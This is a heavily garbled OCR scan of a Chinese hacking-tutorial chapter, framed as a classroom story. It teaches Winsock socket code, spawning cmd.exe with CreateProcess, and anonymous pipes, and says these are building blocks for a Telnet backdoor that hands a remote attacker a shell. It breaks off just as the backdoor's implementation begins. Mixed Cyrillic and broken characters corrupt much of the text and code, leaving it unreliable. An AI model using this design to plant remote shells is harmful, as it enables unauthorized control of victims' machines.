uanrapportad zoccat opliors 
socket -imeout settings 
ЕТ ‘3 Parameters 
Sockst 
run af 


[mn] Address family specimcation. 


Eyopa. "T 
[n] Type specificatiaa For the new socket. 


The folowing are the only two type specifications supported for Wndows Sockets 1.1: 








| ЕСК STREAM Jrnwuindes sequenced, reliahla, tun-way, гп = 
| zased byte streams with ап 208 data transm ssion 


mezhanism. Uses ТСР for the Internet address fami y. 


SOCE DGRAM supperts datagrams. which are connectionless, 
Jnreliable buffers of a fi«ed (typically small? maximum 
mr3tF, Lses UDP for tra Internat address “amily 
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, Avallable it 
Bez1nürnept ЖЛЕ 
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ee Tas 方法 


Sockat, Begir&end i ; ° 
Sockst.BezinSendTo Ux In windows Sacke:s 2, many new s3cket types wil Ee intraduced and na longer nëed to be specified, 
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“有 了 上 面 的 基础 ， 我 们 一 起 来 看 一 个 具体 程序 。 这 个 程序 比较 简单 ， ai 
如 果 有 客户 问 连 接 ， 束 同 它 发 一 字符 串 ， 客 户 问 收 到 后 ， 在 屏幕 上 打出 来 。 


“但 我 们 对 编程 还 不 大 懂 啊 1” 


“这 里 的 目的 是 让 大 家 对 Socket 编 程 有 个 整体 了 解 。 不 用 怕 ， 程 序 我 会 详细 解释 的 ， 首 先是 服 
Zimi. Ял: 


ѕосКкеї ( )-ріпа( )-listen-accept()-recv()/send( )5closesocket() 


具体 代码 如 下 


#include <stdio.h> 

#include <winsock.h> 

#pragma comment(lib,"Ws2 32") 

#define MYPORT 830  /* 定 义 用 户 连 接 端口 */ 
#define BACKLOG 10 /* 多 少 等 待 连 接 控制 */ 
int main() 


int sockfd, new fd; /* 定 义 套 接 字 */ 
struct sockaddr in my addr; /* 本 地 地 址 信息 */ 
struct sockaddr_in their_addr; /* 连 接 者 地 址 信息 */ 


int sin_size; 
WSADATA ws; 


WSAStartup(MAKEWORD(2, 2), &ws ) ; // 初 始 化 Windows Socket D11 
// 建 立 socket 

if ((sockfd = socket(AF INET, SOCK STREAM, 0)) == -1) 

{ 


// 如 果 建 立 socket 和 失败 ， 退 出 程序 
printf("socket error\n"); 


exit(1); 
J 
//Vpbind 本 机 的 MYPORT 端 口 
my addr.sin family = AF_INET; /* 协议 类 型 是 INET */ 
my addr.sin port = htons(MYPORT); /* 绑 定 MYPORT 端 口 */ 
my addr.sin addr.s addr = INADDR ANY; /* 本 机 IP*/ 
if (bind(sockfd, (struct sockaddr *)&my addr, sizeof(struct sockaddr))-- -1) 


//bind 失 败 ， 退 出 程序 
printf("bind error\n"); 
closesocket(sockfd); 
exit(1); 


j 
//listen, тїт 
if (listen(sockfd, BACKLOG) -- -1) 


//1Listen 失 败 ， 退 出 程序 
printf("listen error\n"); 
closesocket(sockfd); 
exit(1); 


printf("listen..."); 

// 等 待 客户 端 连接 

sin size = sizeof(struct sockaddr in); 

if ((new fd - accept(sockfd, (struct sockaddr *)&their addr, &sin size)) -- -1) 


printf("accept еггог\п"); 
closesocket(sockfd); 
exit(1); 


printf("Nnaccept!n"); 
// 有 连接 ， 发 送 ww9830 字 符 串 过 去 
if (send(new_fd, "ww0830\n", 14, 0) == -1) 


printf("send error"); 
closesocket(sockfd); 
closesocket(new fd); 
exit(1); 


printf("send ok!Nn"); 
Г/В, 6 
closesocket(sockfd); 
closesocket(new_fd); 
return 0; 


) 
=== Tri 


BMH: “程序 看 起 来 比较 长 ， 是 因为 加 了 许多 错误 处 理 。 如 果 去 挥 他 们 ， 融 可 以 看 出 程序 的 
Жж. RAES, MIEU P :” 


*1 Bl Z Vm f He BJ Ж =Й : 
先是 初始 化 Windows Socket DII: | wsAstartup(MAKEWORD(2, 2) , &wS ) ; 
然后 建立 Socket :  sockfd = socket(AF INET, SOCK STREAM, 0) 


再 bind 本 机 的 MYPORT 端 口 : 


my addr.sin family = AF INET; Z5 MuGERURSINET 7 
my addr.sin port - htons(MYPORT); /* 绑 定 MYPORT 端 口 */ 
my addr.sin addr.s addr = INADDR ANY; /* 本 机 IP 7 


bind(sockfd, (struct sockaddr *)&my адаг, sizeof(struct sockaddr )) 


接 下 来 监听 端口 : listen(sockfd, BACKLOG) 


如 果 有 客户 端的 连接 请 求 ， 接 收 它 : 


new fd = accept(sockfd, (struct sockaddr *)&their addr, &sin size) 
最 后 发 送 ww0830 字 符 串 过 去 : send(new fd, "ww0830Nn", 14, ©) 

收尾 工作 ， 关 闭 socket : closesocket(sockfd); closesocket(new fd); ” 

“ 哦 ， 果 然 都 是 对 Socket 的 操作 。 可 不 可 以 先 看 看 服务 端的 效果 呢 ? "大 家 问 道 。 


“МЕДУ, #11 5егуег.срр 2. 117, #2 — іё 5 Пт830 А, 283—7, ° 





















































- sever — Microsoft Visual C++ — [zever cpp] "Ed 
B run Edit Viw Insert Project Build Tools Yriverstodio Window Halp ИРГ 
а G :me|2-oc-Immews 3 - ағ 
[Globals] | [Aut global member: =|| Ф main ~| Te 45 3 p бй 

x Hinclude 4stdio.h» 


| 
|, | 


Hinclude &щш1п5йсК „П> 

Hpragma camment(l ih, "Ms2 32") 

"define HYPORT 838 /«;p' APO ay 
Tiii 


#define BACKLOG 48 /»-U 控制 = 
int main() 
4 
int sockfd, new fd; x ЕУ */ 
struct sockaddr in my addr; Am НЕНА = Fi 
struct sockaddr in their_addr; ¿w АЕ Е, + 
int sin size; 
MSRDRTR us; ds 
WshStartup(MAKEMDRD(2,2),8ws); //BD2S4FMindous Socket [11 
JF socket s" “F:XStudy E S ATUE TUTTI TI Telnet Mi VES lou T 


if ((sackfd = smckat(ñF_IHET, SUCK ST 


PH Ф оске Br, 1 H# FE 
printti "socket error'n''); 
рхії(1): 

+ 


/#bind3=F|BSMVP IRTO 

nu addr.sin Family = ñF_IHET; 

my adür.sin port = htons(HvPÜRT) ; 

nu adür.sin addr.s addr = IBHBADDR АН" = 
if (bind(sackFd, (struct sockaddr *)& 
£ 














| 
-Iseupr.exe - B error(s), H uwarning[s) 


| Г № Build ; Derug À Find in Files 1 y | 4 | | 


Ready 








“测试 它 能 否 传输 数据 吧 ! 在 另 一 台 机 器 上 进入 命令 行 界 面 ， 输 入 telnet 服务 器 IP 830, ЖЕ) 
服务 器 IP 是 211.83.154.120， 如 图 3 一 8。” 


La -上 口 |x 


a| 


C:\Otelnet 211.83.154.120 830. 一 





Е x 


WEOE, 1А1ТАЙЖШЩЗ3З—9, 2 2 ХЕ] T BR imk wwo FRFR, PTT T H ; 
BR #- Wa tB EnA (13—10) , ” 


-olx 
ок] ^| 


失去 了 跟 主机 的 连接 . 


"RP, 
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pragna conment(lih,"Ws2 32") 

ücefine HVPORT 838 fj > EER wi 

#define BACKLOG 48 /»3-b Ану 

irt maing) 

t 
int sockfd, new fud; PEL TERT мй 
struct sockaddr in пу айак; /* Hefe Pa. ж 
struct sockaddr in their addr; /* ЕЖЕ ТИ E =; 


int sin size; 


USADATÀ ws; 
ЗАЗ сагир НАКЕШОЕО (2,2) „ёш у; //q5jWindows Socket 011 





JAI sockel sx TF: Stud AEA atita boer, =. Тепе і Ix... 


if ((sackFd = socket(AF_INET. SUCK STREAH, 0) Ti 98 

\ š ' accept! 
FIRE socket NE. 及 出 程序 pend ок? 
printF("sacket errürn"); Press апу key to continue 
ехіЕ(1); Ë i 

} 

¿#hind38i]8JMVvP0R ТГ] 

ny addr.sin Family = ñF_IHET; Jæ |} 

ny addr.sin port = htons(MYPURT); re Hf 


ny addr.sin addr.s addr = IHADDH АНУ — /* Ду 
if ibindísockfd, (struct sockaddr *)&ny айй”, 
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н 
—seuer.exe - B error(s), 8 warning(s) 


| |+ | muile A Debug & FP-nd in Filss . " 4 | e| 
Ready Lu 60, Cul 30 





“6 ju |ды!” 


' 刚 才 使 用 的 Telnet 是 Windows 系 统 自 带 的 程序 。 我 们 既然 可 以 实现 服务 端 程序 ， 那 当然 也 可 
Ия Pini o Rf: 


socket ( )oconnect ( )-send( )/recv()-closesocket() 


НЕ 5-а fA EE! 其 实现 代码 如 下 : ” 


#include <stdio.h> 

#include <stdio.h> 

#include <winsock.h> 

#pragma comment(lib,"Ws2 32") 


4define PORT 830 /* 客户 机 连接 远程 主机 的 端口 */ 
#define MAXDATASIZE 100 /* 每 次 可 以 接收 的 最 大 字 节 */ 


int main(int argc, char *arov[]) 


int sockfd, numbytes; 

char buf[MAXDATASIZE]; 

struct sockaddr_in their_addr; /* 对 方 的 地 址 端口 信息 */ 
if (argc != 2) 


// 需 要 有 服务 问 ip 参 数 
fprintf(stderr,"usage: client hostname\n"); 


exit(1); 
WSADATA м$; 
WSAStartup(MAKEWORD(2, 2), &ws ) ; // 初 始 化 Windows Socket D11 
if ((sockfd = socket(AF INET, SOCK STREAM, 0)) == -1) 


// 如 果 建 立 socket 失 败 ， 退 出 程序 
printf("socket error\n"); 
exit(1); 


j 

// 连 接 对 方 

their_addr.sin_family = AF_INET; Е 
their addr.sin port = htons(PORT); /* 连接 对 方 PORT 端 口 */ 
their addr.sin addr.s адаг = inet_addr(arov[1]); /* 连接 对 方 的 IP */ 

if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) 


// 如 果 连 接 失败 ， 退 出 程序 
printf("connet error\n"); 
closesocket(sockfd); 
exit(1); 


j 
// 接 收 数据 ， 并 打印 出 来 
if ((numbytes=recv(sockfd, buf, MAXDATASIZE, 0)) == -1) 


// 接 收 数据 失败 ， 退 出 程序 
printf("recv errorNn ) 
closesocket(sockfd); 
exit(1); 

у 

buf[numbytes] = '*0'; 

printf("Received: %s",buf); 


closesocket(sockfd); 
return 0; 


MAERAH, "0 Коу f уш, “КЕ ki — DB ! ” 
x12 P gm ERREUR : 
首先 是 初始 化 Windows Socket DII: wsAstartup(MAKEWORD(2, 2), &ws) ; 


然后 建立 Socket :  sockfd = socket(AF INET, SOCK STREAM, 0) 


接 看 连接 服务 器 方 : 


their_addr.sin_family = AF_INET; /* pu ЖК B EINET Ў 
their адаг. ѕіп port = htons(PORT); /* 连接 对 方 PORT 端 口 
their addr.sin addr.s адаг = inet_addr(arov[1]); /* 连接 对 方 的 IP */ 
connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) 


BEER Pj 
连接 成 功 就 接收 数据 :  recv(sockfd, buf, MAXDATASIZE, 0) 
最 后 把 收 到 的 数据 打印 出 来 并 关闭 套 接 字 : 


printf("Received: %s",buf); closesocket(sockfd); 


“这 个 程序 的 执行 要 带 对 方 服务 器 的 IP 地 址 为 参数 ， 所 以 要 这 样 执行 ， 如 图 3 一 11。” 


-上 口 |x 


F:N2client 211.83.154.120_ 





“ЗИП Е 637 РЕ 2 miT, ЗЕЕ ШТИП, 825 172 P ВОЛЕ БЕ ВЫ, ВУЖ АЗ 
— 12. ` 


= -o| x| 


| 211.83.154.120 
Received: uuB83B 


F: <> 





“%! 又 收 到 服务 器 发 的 数据 了 。" 同 学 们 高 兴 的 说 。 


“我 有 点 明白 了 ! 编程 束 是 用 一 系列 的 琅 数 完成 构思 的 流程 图 中 的 每 个 部 分 。"” 宇 强 说 道 ,，“ 所 
以 思路 才 是 关键 。” 


mE -— 民 好 1! "老病 赞扬 的 说 :“ 程 序 шола тЫ 算法 就 是 流程 图 ， 数 据 结 
构 束 是 定义 适当 的 变量 来 调用 适合 的 了 洲 数 。 


“当然 ， 如 果 作为 一 个 软件 ， 就 不 局 限于 此 了 。 软 件 追 求 的 是 满足 用 户 提出 的 需求 ， 并 提供 给 
用 户 人 性 化 的 界面 。， 


Z NZ 


我 们 知道 了 如 何 编程 实现 数据 在 网 络 上 的 传输 ， 束 可 以 给 目标 机 发 送 命 分 和 接收 执行 的 结果 
J 


“传输 是 可 以 了 ， 但 对 方 的 计算 机 怎样 执行 我 们 传 过 去 的 价 爷 呢 ? "08 [e] 38. 


“ 问 得 好 | 这 融 要 涉及 到 进程 通信 以 及 过 道 了 。” 


3.1.2: 讲 程 间 3 (= NE IB 


"FRE Xh—3j8$xf1ShellcodeB9ZJBE : 在 目标 机 器 开 一 个 Telnet BR 5-25, X rz m D, а= 
符 攻 击 机 来 连接 。 当 攻击 机 连接 之 后 ， 为 它 开 创 一 个 cmd.exe， 把 攻击 机 的 输入 输出 和 
cmd.exe 的 输入 输出 联系 起 来 。 这 样 ， 远 程 攻 击 者 融 像 Telnet 一 样 ， 有 了 一 个 远程 Shell。” 


“刚才 我 们 学 习 LE E ml 接受 连接 和 发 送 数据 的 编程 实现 。 接 下 来 我 们 要 : 一 、 开 创 
cmd.exe 进 程 ; 二 、 把 CMD 进 程 和 客户 的 输入 连 起 来 。” 


“ 先 看 第 一 个 ， 为 客户 开创 一 个 cmd.exe。 可 以 用 CreateProcess 来 创建 这 个 子 进程 ， 其 原型 


E. 
AE: 


BOOL CreateProcess( 
LPCTSTR lpApplicationName, 
LPTSTR lpCommandLine, 
LPSECURITY ATTRIBUTES lpProcessAttributes, 
LPSECURITY ATTRIBUTES lpThreadAttributes, 
BOOL bInheritHandles, 
DWORD dwCreationFlags, 
LPVOID lpEnvironment, 
LPCTSTR lpCurrentDirectory, 
LPSTARTUPINFO lpStartupInfo, 
LPPROCESS INFORMATION lpProcessInformation 


» 


"EE | 好 多 参数 啊 ! " 台 下 的 眼睛 都 看 大 了 。 


“很 多 参数 都 可 以 不 用 ， 直 接 用 NULL ( 即 空 ) 来 代替 即 可 。 我 们 把 它 的 第 二 个 参数 设 为 
cmd.exe /k ， 就 可 以 和 直接 创建 一 个 控制 台 窗 口 ， 而 且 不 消失 ， 程 序 如 下 :” 


#include<windows.h> 
int main() 


PROCESS_INFORMATION ProcessInformation; 

STARTUPINFO si; 

ZeroMemory(&si,sizeof(si)); 

CreateProcess(NULL, "cmd.exe /k",NULL, NULL,1,O,NULL, NULL, &si, &ProcessInformation 
return 0; 





“主要 使 用 了 三 个 参数 ， 执 行 效 果 如 图 3 一 13， 开 创 了 一 个 CMD 窗 口 ， 参 数 /k' 使 控制 台 执行 并 
保留 下 来 。” 


°. CreateProcessCED 一 Wicrosoft Visual C++ [设计 ] — createProcess. cpp 图 回国 
THEO dmg) ШШ) ШЕ ERDQO 调试 mm) IA ЫП) #80) 

H-n- ғ ЫЕ ú Bs @ =- £1- p Debug -| b " WE ERAT 
Dj dn л EE 三 三 ANAA. 


ni createlFrocesz. epp | =: J p МУЗЕЕ ав - Сге... п X 


s em С M — — 8 les 
ËR riBinelindeOri ndows. b) | [gà ЖЕЛЕ "DreateProcezsCMD" (I 
i иш = Za CreateFrocezsCEn 
em gint maini) SE 
E | 
Н PROCESS INFORMATION ProcezsInformation; J- ud ЙЕЗЕ 
тє SIARIUPLHEDU si; Ee eateProcesz. epp 
Zerollemory (Asi, sireof(si)]); 28 头 交尾 
| : NS “ay spet? m | > š Ш Wai a PE 
2 CreateProcess (NULL, “emi exe /k", NULL, NULL, 1,0, RULL, WWLL, si, éProcezsiInformation); 
return 0; < y 


te XR... 
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"B ! 好 像 又 是 一 种 开本 地 控制 台 窗 口 的 好 方法 啊 ! "5 RA АЁ, 


“是 啊 ! 你 们 能 意识 到 融 很 好 ! 知识 融 是 这 样 ， 表 后 可 以 融会 贯通 。"” 老 病 说 ， s 
远程 攻击 机 的 输入 输出 和 cmd.exe 的 输入 输出 联系 起 来 了 ， 这 束 涉 及 到 进程 间 的 通信 了 


小 知识 : 进程 间 通 信 PC) М) 


进程 间 通 信 (РС) 机 制 是 指 同一 台 计 算 机 的 不 同 进程 之 间或 网 络 上 不 同 计算 机 进程 之 间 的 通 
信 。Windows 下 的 方法 包括 邮 槽 (Mailslot) 、 管 道 (Pipes) 、 事 件 (Events) 、 文 件 映射 


(FileMapping) 等 。 
“在 


这 里 ， 我 们 使 用 匿名 管道 (Anonymous Pipe) 来 完成 这 个 联系 过 程 。” 
“管道 ?匿名 管道 ?" 大 家 更 晕 了 。 


“管道 (Pipe) 是 一 种 简单 的 进程 间 通 信 (РС) 机 制 。 实 际 是 一 段 共享 内 存 ， 在 Windows 
NT/Win2000/ Win 98/ Win 95 下 都 可 以 使 用 。 一 个 进程 向 管道 宇 入 数据 后 ， 另 一 个 进程 束 可 从 
管道 的 另 一 端 将 其 读 取 出 来 。” 

“管道 分 有 名 和 匿名 两 种 。 命 名 管 e а EE 
之 间 进 行 双 向 通信 。 而 匿名 管道 就 要 简单 多 了 ， 只 是 在 父子 进程 之 间或 者 一 个 进程 的 两 个 子 
进程 之 间 进 行 通信 ， 它 是 单 向 的 。” 


“匿名 管道 实际 上 是 内 存 中 的 一 个 独立 的 临时 存储 区 ， 它 对 数据 采用 先进 先 出 的 方式 管理 ， 并 
严格 按 顺 序 操作 ， 不 能 人 航 搜 索 。” 


“有 了 管道 ， 我 们 向 其 他 进程 传输 数据 时 就 可 像 对 普通 文件 读 写 那 样 简单 。 管 道 操 作 标示 符 是 
HANDLE， 也 就 是 说 ， 我 们 可 以 直接 使 用 readFile、WriteFile 来 读 写 ， 根 本 不 必 了 解 网 络 间 / 进 
程 间 通信 的 有 具体 细节 。” 


老病 说 了 这 么 多 ， 台 下 似 懂 非 懂 


“不 要 紧 ， 等 会 看 看 具体 的 程序 就 能 清楚 流程 和 具体 的 实现 。"” 老 病 轻 松 的 说 道 , “这 里 先 介绍 
一 下 相关 阔 数 ， 匿 名 管道 由 CreatePipe О 函数 创建 。 


CreatePipe () 函数 相关 知识 
CreatePipe () 的 函数 原型 为 : 


BOOL CreatePipe( PHANDLE hReadPipe, 
PHANDLE hwritePipe, 

LPSECURITY ATTRIBUTES lpPipeAttributes, 
DWORD nSize ); 


186208 EI, HROT EN AAEN. 
参数 : 

“hReadPipe” 指 向 返回 的 读 句 柄 的 指针 ; 
“hWritePipe" 指 向 返回 的 写 句 棉 的 指针 ; 
“lpPipeAttributes” 指 向 安全 属性 的 指针 ; 
“nSize" 表 示 管 道 的 大 小 。 


“创建 了 匿名 管道 和 相应 的 读 宇 句柄 后 ， 我 们 把 写 句 柄 放 人 一 个 进程 中 ， 读 句柄 放 人 另 一 个 进 
=, а 1 ak iS p A 2; i 要 是 父子 继承 关系 通过 设置 CreateProcess () 的 
blnheritHandles 为 True 来 实现 。” 


e Z= 


ое 要 把 数据 写 入 Pipe， PRAET JAEN, WriteFileEgZivs Zi aE 
一 个 文件 ， 成 功 返 回 非 0， 失 败 返 回 0 ; 


“ 另 一 个 进程 要 读 取 Pipe 里 的 数据 时 ， Da a оона 4 数 ， 用 来 确定 Pipe 
中 是 否 有 数据 ， 然 后 再 调用 ReadFile 函 数 ， 闻 Pipe 中 的 数据 读 出 。 


“管道 通信 的 整体 流程 示意 图 如 图 3 一 14。” 老 炳 在 黑板 上 画 了 出 来 。 


CreateProcess()E Fk FINE 


AREE 


С” ене Уер 1ге. 


CreatePipe () 


M ESH d H- FPE Z ë; 
| ат ЕЕ 4 — 
hWrtePipe | | ESH 
— | n = hBeadPine 


| 子 进程 
ReadFile(hReadP ipe. 


"Hy ! "AZz—DBAU TES SS I E mu. 


ПЕРЕС 大 家 休息 一 下 ， 下 节 课 我 们 把 它们 结合 起 
来 ， 构 造 出 一 个 完整 的 Telnet 后 门 程序 。 


小 知识 : Pipe 的 共有 用、 建立、 写 和 人 和 读 取 过 程 


(1) Pipe 的 共用 。 Windows 中 的 Pipe 并 不 是 共用 资源 ，2 个 进程 如 果 没 有 “父子 “关系 ， 而 
日 子 进 程 又 没有 继承 父 进 程 资源 ， 那 么 这 2 个 进程 将 无 法 使 用 Pipe 来 传递 数据 。 如 何 让 2 个 进 
程 产生 父子 及 继承 关系 呢 ?条 件 是 子 进程 由 父 进 程 启动 ， 且 在 启动 子 进程 时 必须 设置 好 继承 
参数 。 


上 面 的 条 件 ， 通 过 调用 API 落 数 CreateProcess 丈 可 以 实现 。 其 中 CreateProcess 函 数 用 来 创建 
新 进程 ， 返 回 值 非 0 表示 成 功 ， 为 0 表示 和 失败。 为 了 让 2 个 进程 产生 父子 及 继承 天 系 ， 参 
Zi "blnheritHandles" 5 3% 18 25 True, 


(2) Pipe 的 建立 。 j #PipeBJiL 5, SAEM 35 НАР! #ХСгеаїеР!реЕ t] Ж 
Pipe, 568 Рірез р жж). Е, CreatePipeER2ZX Ak zE— E £ =й, Ы 
值 为 Long， 非 0 表示 成 功 ，0 表 示 失 败 。 


(3) Pipe 的 写 和 信和 读 取 


ERAS 要 将 数据 写 入 Pipe， 调 用 WriteFile 函 数 即 可 ; 其 中 ，WriteFile 函 数 将 数据 写 入 一 
个 文件 。 返 回 值 为 Long，TRUE ( 非 0) 表示 成 功 ， 否 则 返回 0。 


Pipe 的 读 取 : 必须 分 两 步 : 先 调用 PeekNamedPipe 男 数 ， 用 来 确定 Pipe 中 是 否 有 数据 ， 以 避 
免 数 据 接 收 方 长 时 间 等 符 或 处 于 永远 等 待 状态 ; 再 调 用 ReadFile 函 数 料 Pipe 中 的 数据 读 出 。 
Еф, РеекМатеаріре 7 =#Ріреф 35, ЖРірен5 838, БЕ1Е |Ы, 


A кв и, (BReadFileEii& K sr jq 349. 


通过 以 上 步骤 ， 融 可 以 利用 Pipe 技 术 来 传送 效 据 了 。 


3.2 后 门 总 体 思 路 


十 分 钟 后 ， 大 家 《又 坐 好 了 ， 老 病 叮 嘱 道 : "我 一 下 强调 : 学 东西 ， 关 键 是 学 思路 。 有 了 整体 的 
解决 思路 ， 那 剩 下 的 东西 处 理 起 来 融 比 较 方便 了 ， 这 一 点 大 家 干 万 不 要 瑟 记 啊 ! ” 


“m | SB 1 "同学 们 齐 声 答 道 。 
这 里 也 一 样 ， 我 们 先 来 理 清楚 Telnet 后 门 实现 的 总 体 流程 ， 再 来 看 如 何 实现 。” 
老病 说 :“ 大 家 先 讨论 一 下 ， 如 何 根 据 刚才 的 背景 知识 编 守 出 Telnet 的 后 门 程序 。 


老病 接着 说 :“ 这 次 采用 分 组 方式 ， 每 两 个 人 一 组 ， 先 组 内 讨论 ， 然 后 每 个 组 把 构想 的 方法 公 
布 出 来 ， Ex [e 后 大 家 再 来 一 起 讨论 。” 


“分 组 就 按 名 单 来 分 吧 1 ”老病 对 着 花 名 册 念 到 ,， “古风 和 玉 波 一 组 ; 宇 强 和 吴 小 倩 一 组 ...... 
宇 强 的 心里 一 为 之 动 : 我 名 字 和 吴 小 倩 的 名 字 是 挨 在 一 起 的 么 ? 


分 组 完毕 ， 大 家 都 忙 着 找 Partner， 并 七 跨 八 舌 的 讨论 起 来 。 宇 强 也 站 了 起 来 ， 走 到 小 倩 面 
ВІ], JD RERO GR : dX4i1x& — ZA Bes ? " 


“EW, (RE F mU, (Rf !” J 8 3855882 TR, AAR — s F 52BUJ32B7K. 
“你 ...... 好 1!” 宇 强 反而 还 有 一 阵 慌 乱 。 
“你 坐 下 啊 1 "小 倩 指 着 劳 边 的 位 子 说 。 


“好 的 ，” 衬 强 的 大 脑 是 一 片 实 日 ， 闻 到 小 倩 秀 发 对 过 来 的 清香 味 ， 不 么 迷糊 了 ， 是 梦 还 是 现实 
Ше? 


№ 


“你 的 思路 是 什么 呢 ? ”一 个 声音 把 宇 强 拉 f. 回来 。 宇 强 急忙 理 理 思 , 说 道 : “具体 的 我 还 不 太 


清楚 ， 但 有 一 些 感觉 
R? 什么 感觉 呢 ?， 


其 实 ， 插 强 想 说 是 对 你 有 感觉 ， 但 党 得 未 免 太 唐 突 和 捅 笑 了 ， 于 是 说 : был ша. 
了 ， 我 感觉 把 它们 按 一 定 的 逻辑 组 合 起 来 ， 就 可 以 得 到 完美 的 TInet 后 门 程序 。 


", if dB ? "小 倩 感 尖 趣 的 说 道 ，“ 我 觉得 也 有 可 能 是 这 样 。” 
， 我 们 边 讨 论 边 宇 下 来 吧 ! 衬 强 看 到 小 倩 并 不 讨厌 目 己 ， 心 里 又 了 镇 定 很 多 。 


“ВУ, "ЛМЕ Н 026, р, “首先 是 有 攻击 机 、 标 机 ， 它 们 之 间 可 以 通过 套 接 字 
Socket 通 信 ， 如 图 3 一 15。 







и 上 “k F А, А. 
发 送 命令 





(socket 








返回 执行 结 


“多 和 和 集 永 的 字 啊 1” 宇 强 瞳 想 。 мача TkT, РЕТ: “R, Жаа AX 
进程 和 子 进程 ， 它 们 之 间 可 以 通过 管道 pipe 通 信 。” 


"sm, x], ШШЕ RAD!" 
“匿名 管道 是 单 向 的 ， 所 以 要 相互 通信 必须 要 建 两 个 匿名 管道 。” 手 强 提醒 道 。 


“I, xp! 所 以 应 该 是 这 样 ， 如 图 3 一 16。” 





“然后 呢 ? " 画 好 图 后 ， 小 倩 问 。 


宇 强 说 : "我 想 应 该 把 两 个 图 合 起 来 。 T E 目标 机 的 父 进程 ， 目 标 
机 的 父 进 程 又 通过 一 个 匿名 管道 传 给 子 进 程 ， 这 里 的 子 进 程 应 该 是 cmd.exe，cmd.exe 执 行 命 
令 后 ， 把 结果 通过 另 一 个 匿名 管道 馆 给 父 进 程 ， 父 进程 最 后 再 通过 Socket 返 回 给 攻击 机 。 其 
示意 图 应 该 如 图 3 一 17。” 


( socket) 





"EE ! 思路 越 来 越 清楚 了 1 "小 倩 欢呼 到 。 
dB... FIRRA, AEE, “这 个 方法 可 不 可 行 ， 如 何 编程 实现 ， 我 都 还 不 太 清算 。” 


“能 想到 这 一 点 ， 已 经 非常 不 错 了 ! "号 后 一 个 声音 把 两 人 都 吓 了 一 跳 。 两 人 回头 一 看 ， 原 来 名 
病 巡 查 到 这 儿 来 了 。 


“好 了 ，" 老 病 对 看 全 班 同学 大 声 说 道 , “分 组 讨论 融 到 这 里 。 大 家 回 到 原来 的 位 置 上 去 ， 我 们 
一 起 来 总 结 。” 


教室 里 又 是 一 阵 人 忙乱， 王强 犹豫 的 站 了 起 来 ， 致 气 和 勇气 向 小 倩 问 道 :“ 吕 ， 可 以 问 下 你 的 电话 
吗 ?" 接 看 忙 解释 到 :“ 以 后 有 什么 问题 候 好 讨论 啊 1” 


“TR ! 这样 啊 ， 我 的 电话 8541XXXX。 "女孩 笑 了 , “应 该 是 我 多 向 你 请 教 才 是 呢 ! 
“哪里 哪里 ， 互 相 学 习 嘱 1!” 宇 强 一 边 客 气 ， 一 边 抑 制 住 住 心中 的 喜 惕 。 

回 到 位 置 上 ， 华 一 劳 的 古风 问 道 : БАЖ? 有 结果 么 ?” 

"ag | 一 般 般 吧 1” 宇 强 心 不 在 末 的 说 ， 只 顾 忙 着 找 纸 把 号 码 记 下 来 。 

“我 和 玉 波 讨论 的 结果 是 这 样 的 ，”" 古 风 说 道 ，“ 我 们 觉得 可 行 ， 老 炳 也 说 可 行 ，Yeah !” 
"He?" 于 强 记 下 了 号 码 ， 听 吝 风 这 人 么 一 说 ， 兴 趣 也 一 下 子 提 了 起 来 ,“ 是 什么 思路 呢 ? 


古风 说 :“CreateProcess 可 以 传 参 数 开 进程 ， 像 刚才 的 ста /k ， 那 目标 机 通过 网 络 收 到 命令 
后 ， 就 以 命令 为 参数 开 和 启 一 个 CMD 新 进程 ， 比 如 cmd /c dir ， 命 令 执 行 完 毕 后 新 进程 自动 消 
失 ， 结 果 通 过 一 个 匿名 管道 返回 给 父 进程 ， 父 进程 由 Socket 传 回 给 攻击 机 。” 


古风 拿 出 他 们 画 的 示意 图 ， 如 图 3 一 18。 
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“不 错 不 错 1” 宇 强 先 叹 道 ， 心 里 瞳 想 :“ 我 怎么 就 没有 想到 呢 ? ' 

“ 那 你 们 的 思路 呢 ? "古风 说 完 后 问 宇 强 。 

FRERAO, PEREHI : "大 家 安静 ， 我 们 来 总 结 一 下 。 " 课 音 逐渐 安静 下 来 ， 古 风 
和 宇 强 也 停止 了 说 话 。 


老病 说 : “刚才 我 注意 了 大 家 的 讨论 ， 都 很 认真 ， 而 且 也 提出 了 很 多 不 错 的 思路 。 同 学 们 大 都 
想 出 来 了 ，ShellCode 的 功能 分 为 主 进程 和 子 进程 ， 主 进程 的 功能 是 网 络 连 接 一 一 传输 命 分 和 
结果 ; 子 进程 的 功能 是 执行 cmd.exe 命 爷 。” 


老 JP 2% 25 卖 说 : “要 把 cmd. exe 的 输入 输 an 和 主 进 程 联系 起 来 ， 有 两 种 思路 。 一 种 方法 是 只 
一 个 匿名 管道 ， 有 命 тене 主 进程 以 数据 为 参数 马上 新 建 一 рено, ct 
AE E H ES A eS aeu [B 


宇 强 愉 愉 对 古风 说 : “是 你 们 的 思路 也 。 "rh AUS T 


“ 另 一 种 方法 是 用 两 个 匿名 管道 ， 只 开 一 个 cmd.exe 进 程 。 有 命令 来 时 ， 通 过 一 个 匿名 管道 传 
给 cmd.exe， 执 行 结果 通过 另 一 个 匿名 管道 返回 给 主 进程 。” 


这 就 是 我 们 的 思路 1 ?" 宇 强 兴 奋 的 对 古风 说 。 


老病 在 台 上 继续 总 结 道 : “第 一 种 方法 的 好 义 是 : 来 一 个 命令 数据 融 马 上 开 cmd.exe 进 程 执行 
并 退出 ， ap TZ AES ; 而 第 二 种 方法 的 好 人 处 是 : 只 创建 了 一 次 
cmd.exe 的 进程 。” 


小 结 : 


第 一 种 思路 : 一 个 管道 。 有 命令 来 ， 则 以 命令 为 参数 开 CMD 进 程 ， 执 行 结果 从 管道 返回 ; 
第 二 种 思路 : 两 个 管道 。 开 创 CMD 进 程 ， 命 令 数 据 从 一 个 管道 中 输入 ， 执 行 结果 从 另 一 个 管 
道中 返回 。 


3.3 Telnet 后 门 的 局 级 语言 实现 
“ 那 怎 么 编程 实现 呢 ? "李强 按 擦 不 住 好 奇 的 心情 ， 问 道 。 
“是 啊 ， 怎 么 实现 呢 9" 其 他 同学 也 很 想 知道 。 


老病 说 :“ 好 的 。 大 家 想 的 这 两 种 方法 ， 思 路 上 都 差不多 ， 我 们 一 起 来 看 看 它们 的 实现 吧 1” 


3.3.1 NEEN ВУЗЕ M 
老病 说 ,，“ 我 们 首先 看 看 两 个 匿名 管道 情况 的 实现 方法 。” 
